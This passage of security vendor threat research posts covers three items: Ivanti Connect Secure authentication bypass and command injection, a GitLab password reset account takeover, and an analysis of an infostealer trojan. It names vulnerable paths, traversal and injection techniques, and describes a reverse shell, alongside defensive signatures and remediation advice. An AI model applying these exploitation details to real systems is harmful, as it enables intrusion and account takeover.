    • Version 9.1: r1, r10 – r11, r12 – r13.1, r14, r15 – r16, r17 – r18, r2 – r4.2, r5 – r9.1
    • Version 22.1: r1, r6
    • Version 22.2: r1, r3
    • Version 22.3: r1, r3
    • Version 22.4: r1, r2, r2.1
    • Version 22.5: r1, r2.1
    • Version 22.6: r1

Each entry is formatted as “Version: Revision(s)”, where “-” indicates the base version and specific revisions are listed thereafter.

CVE Details

This security issue has been formally acknowledged and indexed in the Common Vulnerabilities and Exposures (CVE) system, explicitly identified as CVE-2023-46805 and CVE-2024-21887.

CVE-2023-46805 carries an overall CVSS score of 8.2 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N), highlighting its high severity. The score’s detailed composition indicates the vulnerability’s attributes and potential repercussions. It has a network-based attack vector, meaning the vulnerability can be exploited remotely, and its attack complexity is low, suggesting minimal effort is required for exploitation. It necessitates no special privileges, increasing its potential reach, and it doesn’t require user interaction, enhancing its stealth and potential for unnoticed exploitation. Although the scope of the attack is unchanged, the vulnerability critically endangers data confidentiality, implying a significant risk of sensitive data exposure. However, its impact on data integrity is low, and it does not affect data availability, suggesting that unauthorized data disclosure is more likely than data alteration or service disruption.

Contrastingly, CVE-2024-21887 presents an even more critical threat, evidenced by its CVSS score of 9.1 (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H). While this vulnerability shares certain characteristics with CVE-2023-46805 — such as a network-based attack vector and low attack complexity — it differs notably in its requirement for high privileges, indicating it affects more protected or sensitive areas. Like its counterpart, it operates covertly without user interaction. However, this vulnerability’s scope is classified as changed, hinting at a broader, more systemic impact. Its high ratings across confidentiality, integrity and availability underscore its potential for extensive harm, allowing attackers not only to access and modify sensitive data but also to significantly disrupt dependent services or applications.

Technical Overview

An alarming authentication bypass vulnerability has been reported in Ivanti Connect Secure, attributed to superficial access checks on the unnormalized Request-URI in the web process. This flaw is notably present in Ivanti Connect Secure (versions 9.x, 22.x) and Ivanti Policy Secure, where a specifically crafted request with a Request-URI beginning with vulnerable paths such as “/api/v1/totp/user-backup-code/” or “/api/v1/cav/” can evade standard authentication protocols. This vulnerability arises due to the web process’s reliance on a vulnerable function that conducts basic string comparisons against predefined prefixes, allowing requests that match these paths to bypass authentication checks. The exploit hinges on manipulating the Request-URI, incorporating parent reference segments (e.g., “../”) to pivot to endpoints normally safeguarded by authentication. However, the exploit’s scope is somewhat contained due to session checks and the limited distribution of the REST API, restricting accessible endpoints to those managed by the receiving WSGI (Web Server Gateway Interface) process.

Further probing into the system’s architecture revealed a critical loophole in a custom web server developed in C++, integral to managing all incoming HTTPS requests and closely associated with Perl-based CGI scripts and the REST API. Situated within the system’s binary structure at ics_disk1/root/home/bin/web, this server serves not only as a gateway for HTTPS requests but also plays a pivotal role in the REST API’s functionality. Acting as a proxy, the server directs requests to the API as necessary, focusing heavily on authentication enforcement. However, the authentication mechanism is compromised by the server’s flawed URI processing method, which employs a strncmp function for path validation. This function’s limitation to checking only a set number of initial characters in the path creates a significant security gap. By crafting a path (see Figure 1) that initiates with a vulnerable endpoint and appending additional characters, attackers can navigate around the authentication, gaining unauthorized access to sensitive resources and functions within the system. This discovery underscores the urgency for a comprehensive overhaul of the security measures, particularly the methods for URI path validation and processing.

Figure 1: Example GET Request Path

Triggering the Vulnerability

The vulnerability in Ivanti Connect Secure related to authentication bypass can be triggered under certain conditions. Here are four key scenarios or factors that can lead to the exploitation of this vulnerability:

  • Unnormalized Request-URIs: The vulnerability is exploited by sending a request with a Request-URI that starts with specific paths and has not been normalized, allowing the attacker to circumvent the expected URL structure and access controls.
  • Prefix Matching in URL Paths: The web process performs shallow checks by comparing the raw Request-URI against a list of vulnerable prefixes. If the Request-URI matches one of the known vulnerable paths, such as “/api/v1/totp/user-backup-code/” or “/api/v1/cav/”, the request is allowed to pass through without proper authentication.
  • Use of Directory Traversal Techniques: The attacker can employ directory traversal techniques using “../” notation in the Request-URI. This allows the attacker to pivot from the allowed prefix to another endpoint that normally requires authentication, effectively bypassing the access control checks.
  • Limited Endpoint Scope Due to Distributed REST API: While the vulnerability allows pivoting to different endpoints, the scope of accessible endpoints is limited to those implemented by the receiving WSGI process. However, this still poses a significant risk as it exposes certain endpoints of the REST API to unauthenticated access.

Exploitation with CVE-2024-21887

Developed with Flask, a Python-based, lightweight, and flexible web framework, a Flask application simplifies starting and scales up to complex commercial sites, providing an array of tools, libraries, and technologies. Despite its benefits, Flask applications can exhibit vulnerabilities, such as the command injection flaw in the License class of restservice/api/resources/license.py which manages requests for the /api/v1/license/keys-status endpoint. This vulnerability arises from the get method’s improper concatenation of command strings, especially when handling the node_name parameter, enabling attackers to execute arbitrary commands via subprocess.Popen.

Leveraging Flask’s automatic mapping of URL endpoints to function parameters, attackers can send crafted GET requests to redirect to vulnerable endpoints with command injection payloads, with URL encoding complicating the attack by allowing the transmission of intricate payloads. Although these vulnerabilities present substantial security risks, it is notable that vendor-supplied mitigations effectively counteract these exploits. Notably, this vulnerability allows attackers to achieve unauthenticated command injection by sending a GET request to the following URI path where CMD is any arbitrary Linux OS (Operating System) command, presenting a significant security concern.

Figure 2: URI path

Figure 3: Python Source Code for Arbitrary Linux OS Reverse Shell

Given the scenario of exploiting a command injection vulnerability (Figure 5) at the endpoint seen in Figure 4.

Figure 4: Endpoint

Figure 5: Reverse Shell URI Path

This one-liner Python command (Figure 5) is crafted to establish a reverse shell from the target server to the attacker’s machine. This command, when appended to the vulnerable endpoint, would be executed on the server due to the vulnerability. The Python script, starting with a semicolon to signify the end of a previous command, is a compact and potent snippet designed to create a socket connection back to the attacker’s machine (at IP address 192.168.2.200 and port 5555).

Once the connection is established, it spawns a shell and redirects the shell’s standard input, output and error streams to the socket, effectively tying the shell to the attacker’s console.

This provides the attacker with interactive control over the shell on the target machine. However, for this command to be successfully processed and interpreted by the web server and not get blocked by URL parsing mechanisms, it must be URL-encoded before being sent in the GET request to the vulnerable endpoint. URL encoding transforms potentially unsafe ASCII characters into a format that can be transmitted over the internet, ensuring the payload is delivered intact to the server for execution

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signatures have been released:

  • IPS:4234 Ivanti Connect Secure Authentication Bypass
  • IPS:19611 Ivanti Connect Secure Command Injection 1
  • IPS:19612 Ivanti Connect Secure Command Injection 2

Remediation Recommendations

The risks posed by this vulnerability can be mitigated or eliminated by:

  • Applying the vendor-supplied patch to eliminate this vulnerability.
  • Utilizing up to date IPS signatures to filter network traffic.
  • Configure the vulnerable product to allow access to trusted clients only.

Relevant Links

Vendor Advisory

NIST NVD CVE

Packetstrom Security

CWE-287

Related KB Article

NIST CVSS Calculator Score

Python Reverse Shells

GitLab Account Takeover

Overview

The SonicWall Capture Labs threat research team became aware of an account takeover via password reset vulnerability in GitLab, assessed its impact and developed mitigation measures for the vulnerability. GitLab, an open-source code-sharing platform, published an advisory on this vulnerability affecting GitLab CE/EE versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2. Considering the substantial user base as well as the existence of public POC, not only it is expected to be exploited in the wild, but it will also presumably join CISA’s Known Exploited Vulnerabilities (KEV) catalog. Because of this, GitLab users are strongly encouraged to upgrade their instances to the latest versions as applicable.

CVE Details

This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2023-7028.

The CVSS score is 10.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H), based on the following metrics:
• Attack vector is network.
• Attack complexity is low.
• Privileges required is none.
• User interaction is none.
• Scope is changed.
• Impact of this vulnerability on data confidentiality is high.
• Impact of this vulnerability on data integrity is high.
• Impact of this vulnerability on data availability is high.

Technical Overview

This vulnerability was introduced in version 16.1.0 when the enhancement in the password reset function was made that enabled users to reset their password using a secondary email address. The flaw in the implementation of this process lets the threat actors abuse the password reset functionality and deceive the application into sending the reset link to the attacker-controlled email address by leveraging the parameter pollution technique.

To remediate the issue, new versions are being released with a patch (as seen in the commit) that enforces the password reset instructions to be sent to the users’ secondary email only if it’s confirmed, unlike previous versions. The password reset page of the patched version of GitLab reflects the same message as well, as seen in Figure 1.

Figure 1: Reset password instructions in vulnerable vs patched version

Triggering the Vulnerability

The only prerequisite for this attack is that the threat actor knows the victim’s email address. Combine that with the low attack complexity, and that makes exploitation of this vulnerability very straightforward. Additionally, the attackers can make use of ‘admin@example.com’, which is the default registered email address for the user ‘root’, to gain the highest privilege available – provided the user has not deleted the pre-registered email. The attacker then needs to construct the post request using the legitimate email address of the victim and their own email address to receive a password reset link. The sample URL-decoded request data would look like this:

Figure 2: Sample URL

Exploitation

The malformed password reset request, as demonstrated in Figure 3, needs to be sent to acquire the password-reset link of the victim account to the attacker-controlled unverified mailbox which yields an attacker access to the victim account by resetting the password.

Figure 3: Sample attack request

Two-factor authentication (2FA) can lessen the risk to an extent by denying the threat actor account access, but the underlying risk of the password being reset by an unauthorized user will still be present.

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signature has been released:

  • IPS:4229 GitLab Password Reset Attempt Using Multiple Email IDs
  • IPS:4231 GitLab Password Reset Attempt Using Multiple Email IDs 2

Indicators of Compromise (IOC)

As mentioned in the vendor advisory, the users can access the following logs to check the potential attempts to exploit this vulnerability:

  • Check gitlab-rails/production_json.log for HTTP requests to the /users/password path with value.email consisting of a JSON array with multiple email addresses as shown in below sample:{“method”:”POST”,”path”:”/users/password”,”format”:”html”,”controller”:”PasswordsController”,”action”:”create”,”status”:302,”location”:”http://gitlab.sw.local/users/sign_in”,”time”:”2024-01-16T09:53:16.121Z”,”params”:[{“key”:”authenticity_token”,”value”:”[FILTERED]”},{“key”:”user”,”value”:{“email”:[“victim@example.com”,”attacker@example.com”]}}],”correlation_id”:”08V0ZKAEAF9Q8QQ6X867DFS”,<truncated…>}
  • Whereas normally a sample log for the legitimate request would look like: {“method”:”POST”,”path”:”/users/password”,”format”:”html”,”controller”:”PasswordsController”,”action”:”create”,”status”:302,”location”:” http://gitlab.sw.local/users/sign_in”,”time”:”2024-01-17T14:25:38.840Z”,”params”:[{“key”:”authenticity_token”,”value”:”[FILTERED]”},{“key”:”user”,”value”:{“email”:”user@example.com”}}],”correlation_id”:”01X0ECS3P6ZEF55YRA7XNNH”,<truncated…>}
  • Check gitlab-rails/audit_json.log for entries with caller_id of PasswordsController#create and target_details consisting of a JSON array with multiple email addresses.

Remediation Recommendations

  • Enable Two-Factor Authentication (2FA), a silver bullet to deny unauthorized access, for all accounts.
  • GitLab released an update to address the issue, and it is highly recommended to update the application to version 16.7.2, 16.6.4, 16.5.6 or newer as appropriate. Notably, since this security fix has been backported to versions 16.1.6, 16.2.9, 16.3.7 and 16.4.5, the users can choose to update the application to those versions as well.

Relevant Links

Infostealer Trojan with Remote Access and Ransomware Capabilities Seen in the Wild

This week, the Sonicwall Capture Labs threat research team analyzed a full-featured infostealer and remote access trojan that also has ransomware functionality built in. This trojan is capable of terminating applications, logging keystrokes, opening web pages, connecting to a remote host, executing DDoS attacks and encrypting the victim’s data.

Infection Cycle:

The malware arrives as a portable executable using the following file name and icon:


Figure 1: Filename and icon used by the trojan

Upon execution, it creates a copy of itself in the temp directory named csrss.exe. It then spawns the legitimate Windows Task Scheduler and runs an schtasks command to ensure that this copy runs itself periodically.


Figure 2: Scheduled task added

It also adds a run key in the HKU hive:

  • HKU\Software\Microsoft\Windows\CurrentVersion\Run csrss %temp%\csrss.exe

During runtime, it intermittently connects to a remote host.


Figure 3: Malware seen connecting to a remote host

It also creates a log file in the user’s temp directory, which appears to be keystrokes of websites visited and processes executed.


Figure 4: Log file with all the keystrokes logged during runtime

Upon further analysis, this trojan appears to be capable of encrypting files using AES encryption using the RijndaelManaged class.


Figure 5: AES encryption function inside this trojan

It also has the ability to open and close arbitrary web pages, shutdown, logoff, or restart the machine, run PowerShell commands, and start a DDoS attack.


Figure 6: All the other malicious functionalities available within this trojan

This trojan also has the ability to capture screenshots of the victim’s machine.


Figure 7: Screen capturing functionality within the trojan

SonicWall Protections:

SonicWall Capture Labs provides protection against this threat via the following signature:
GAV: Malagent.XCL(Trojan)

This threat is also detected by SonicWall Capture ATP with RTDMI and Capture Client endpoint solutions.